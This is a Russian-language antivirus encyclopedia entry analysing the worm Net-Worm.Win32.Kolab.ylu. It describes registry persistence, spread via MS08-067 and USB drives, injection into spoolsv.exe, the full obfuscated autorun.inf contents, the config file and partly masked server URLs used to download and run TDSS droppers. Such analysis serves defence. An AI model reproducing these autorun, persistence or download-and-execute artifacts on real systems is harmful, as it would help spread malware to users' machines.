Net-Worm.Win32.Kolab.ylu

21.02.2012

Сетевой червь, создает свои копии на съемных дисках, а также загружает и устанавливает другое программное обеспечение на зараженном компьютере без ведома пользователя.

Технические детали

Сетевой червь, создает свои копии на съемных дисках, а также загружает и устанавливает другое программное обеспечение на зараженном компьютере без ведома пользователя. Является приложением Windows (PE-DLL файл). Имеет размер 60928 байт. Упакована неизвестным упаковщиком. Распакованный размер - около 136 Кб. Написана на C++.

Инсталляция

Копирует свое тело во временный каталог текущего пользователя под именем: <>%Temp%\srv<rnd1>.tmp где <rnd1> - случайный набор из цифр и букв латинского алфавита, например "7E4" или "1E8".

Для автоматического запуска созданной копии червя при каждом следующем старте системы создается служба, за которую отвечает ключ системного реестра:

[HKLM\System\CurrentControlSet\Services\srv<rnd1>]

В отдельном потоке червь непрерывно восстанавливает запись о своей службе в системном реестре. Для работы в безопасном режиме, червь создает следующую запись в системном реестре:

[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\srv<rnd1>]  "(default)"="service"

Распространение

Червь имеет следующие механизмы распространения:

Распространяется по сети зараженного компьютера, используя уязвимость MS08-067.

Червь копирует свое тело на все доступные для записи съемные диски, подключаемые к зараженному компьютеру:

<имя зараженного диска>:\setup50045.fon

Также создаются файлы:

<имя зараженного диска>:\myporno.avi.lnk  <имя зараженного диска>:\pornmovs.lnk  <имя зараженного диска>:\setup50045.lnk

Которые предназначены для запуска червя.

Вместе со своей копией червь помещает в корневой каталог зараженного диска файл:

<имя зараженного диска>:\autorun.inf

следующего содержания:

[AUTORuN]  acTiON=opEN  eixrgvyqxnqvgomwivn=trppqscjmhqpcfp  ICoN=%wInDir%\SySTEm32\shELl32.Dll,4  oxvgyrdxbiqedrfhcvnhxcnsrimepigtwgheh=givscvssyxxapiicclucwk  USeAUtOplAy=1  txdkjbh=yfmnbyowpigsbnaxqfhqmeqe  OpeN=RunDLl32.exE SetuP50045.foN,9D025  ekrvkkwgfucivppdrtavoe=lacmlkuxqkcfyuqipufgse  sHell\ExPlORe\command=ruNDLl32.eXe SETuP50045.foN,9D025  ltuqtafivakqjmxfadfopw=mqdcyvbgpwdguytatvrk  SHell\OpeN\cOMMaND=rUNDlL32.EXe SEtUP50045.FOn,9d025  jbdodnvlwdeqo=trirjdmlfttsdtiicwfbtvcx

Данный файл обеспечивает червю возможность запускаться каждый раз, когда пользователь открывает зараженный раздел при помощи программы "Проводник".

Созданным файлам присваиваются атрибуты "скрытый" и "системный".

Деструктивная активность

Червь выполняет внедрение своего кода в системный процесс:

spoolsv.exe

Отвечающий за работу службы:

spooler

После чего в разных потоках выполняет инсталляцию и распространение. Свои настройки червь хранит в следующем файле:

%Temp%\srv<rnd1>.ini

Который содержит следующие строки:

[main]  source=1  affid=50045  id=bbbbbbbbbbbb<ID>  server=http://195.**.***.136/  downloaded=1

где <ID> - значение параметра "MachineGuid" в ключе системного реестра:

[HKLM\Software\Microsoft\Cryptography]

Червь обращается по следующему URL адресу:

http://195.***.***.138/service/listener.php?affid=50045

И выполняет загрузку стороннего программного обеспечения, по следующему URL адресу:

http://195.***.***.139/service/scripts/files/aff_50045.dll

На момент создания описания загружались различные модификации вредоносов семейства Trojan-Dropper.Win32.TDSS.

Загруженный файл сохраняется во временном каталоге текущего пользователя:

%Temp%\<rnd2>.tmp

где <rnd2> - случайный набор из цифр и букв латинского алфавита. Затем червь запускает на выполнение загруженный файл.

Хакеры ненавидят этот канал!

Спойлер: мы раскрываем их любимые трюки

Расстройте их планы — подпишитесь